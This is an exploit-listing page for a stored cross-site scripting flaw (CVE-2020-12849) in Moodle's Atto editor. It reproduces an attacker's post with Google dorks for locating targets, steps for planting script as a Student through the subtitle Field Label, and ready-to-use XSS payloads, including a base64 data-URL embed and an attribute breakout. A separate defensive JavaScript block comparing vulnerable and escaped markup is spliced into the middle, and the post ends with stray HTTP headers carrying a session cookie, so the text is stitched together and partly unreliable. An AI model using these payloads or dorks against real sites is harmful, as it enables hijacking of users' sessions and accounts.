Moodle Atto Editor Cross Site Scripting

CVE             Category  Price  Severity
CVE-2020-12849  CWE-79    $500   High

Author    Risk  Exploitation Type  Date
John Doe  High  Remote             2021-03-26
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

Our sensors found this exploit at:

Below is a copy:

# Exploit Title: Moodle Atto Editor Cross Site Scripting
# Date: 26.03.2021
# Author: Vincent666 ibn Winnie
# Software Link:
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month
# My Youtube Channel:


Video PoC: (Update)

Stored XSS in Atto Editor (default editor)

Use the demo:

Choose a role: Student (example)

Open the calendar:

Create a new event:


Event Title: "Test"

Description: choose Insert Video File and choose Video:

Video Source URL: you can paste a video link from YouTube

Then open Subtitles and Captions:

Subtitle track URL: use a video link from YouTube

Field Label: here we can use XSS code:

<img src="1" onerror="alert(1)" />

or try in base64

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>

Click Insert Media and save this.

Open the event and get stored XSS.

Or we can use the Profile:

The Field Label in the editor is vulnerable to XSS.

We can use XSS and a JS redirect in the profile:

"><video src/onerror=alert(1)><img src=x'');>
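The Field Label sink described above, as an added example that is not Moodle's or the Atto editor's own code: a hypothetical template that concatenates the label straight into `<track>` markup, beside its hardened form that encodes for the attribute context and allowlists the media URL scheme (which also rejects the `data:` URL used in the `<embed>` payload). The `<track>` template, the function names and the sample caption URL are assumptions; the payloads are the ones quoted in the advisory.

```javascript
// Added example (not Moodle's or Atto's code). Demonstrates why an unescaped
// "Field Label" becomes stored XSS and the two checks that close it:
// contextual HTML encoding and a URL scheme allowlist.

// Encoder for text nodes and double-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[ch]));
}

// Allow only http(s) media URLs. Parsing with the global WHATWG URL class
// rejects data: and javascript: schemes before they reach the markup.
function isSafeMediaUrl(candidate) {
  let parsed;
  try {
    parsed = new URL(String(candidate));
  } catch (e) {
    return false; // unparsable input is never a usable media URL
  }
  return parsed.protocol === 'https:' || parsed.protocol === 'http:';
}

// Hypothetical vulnerable sink: the label and URL are concatenated into the
// <track> element, so a label containing '"><' closes the attribute and the
// rest of the input is parsed as new elements.
function buildTrackUnsafe(label, src) {
  return '<track kind="subtitles" src="' + src + '" label="' + label + '">';
}

// Hardened form: the URL is validated first and every untrusted value is
// encoded for the attribute context it lands in.
function buildTrackSafe(label, src) {
  if (!isSafeMediaUrl(src)) {
    throw new Error('rejected media URL: ' + src);
  }
  return '<track kind="subtitles" src="' + escapeHtml(src) +
         '" label="' + escapeHtml(label) + '">';
}

// Crude check on a rendered fragment: how many element start tags does it
// contain? One means only <track>; more means the input injected markup.
// Illustrative only, not a substitute for a real HTML parser.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Payloads quoted in the advisory.
const LABEL_PAYLOAD = '<img src="1" onerror="alert(1)" />';
const BREAKOUT_PAYLOAD = '"><video src/onerror=alert(1)><img src=x\'\');>';
const DATA_URL = 'data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+';

// Constructed sample caption URL (assumption, not from the advisory).
const CAPTION_URL = 'https://www.example.com/captions.vtt';

function demo() {
  return {
    unsafeTags: countTags(buildTrackUnsafe(LABEL_PAYLOAD, CAPTION_URL)),        // 2
    safeTags: countTags(buildTrackSafe(LABEL_PAYLOAD, CAPTION_URL)),            // 1
    unsafeBreakout: countTags(buildTrackUnsafe(BREAKOUT_PAYLOAD, CAPTION_URL)), // 3
    safeBreakout: countTags(buildTrackSafe(BREAKOUT_PAYLOAD, CAPTION_URL)),     // 1
    dataUrlAccepted: isSafeMediaUrl(DATA_URL),                                  // false
  };
}

console.log(JSON.stringify(demo()));
```

The point of the two sinks side by side is that the fix is not a blocklist of `<img` or `onerror`: encoding for the attribute context turns every `<`, `>` and `"` in the label into inert entities, and validating the URL scheme up front keeps `data:` content out of `src` regardless of what the label contains.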



User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 996
Connection: keep-alive
Cookie: MoodleSession=4ea0036558425526decc096ed375b886; EU_COOKIE_LAW_CONSENT=true

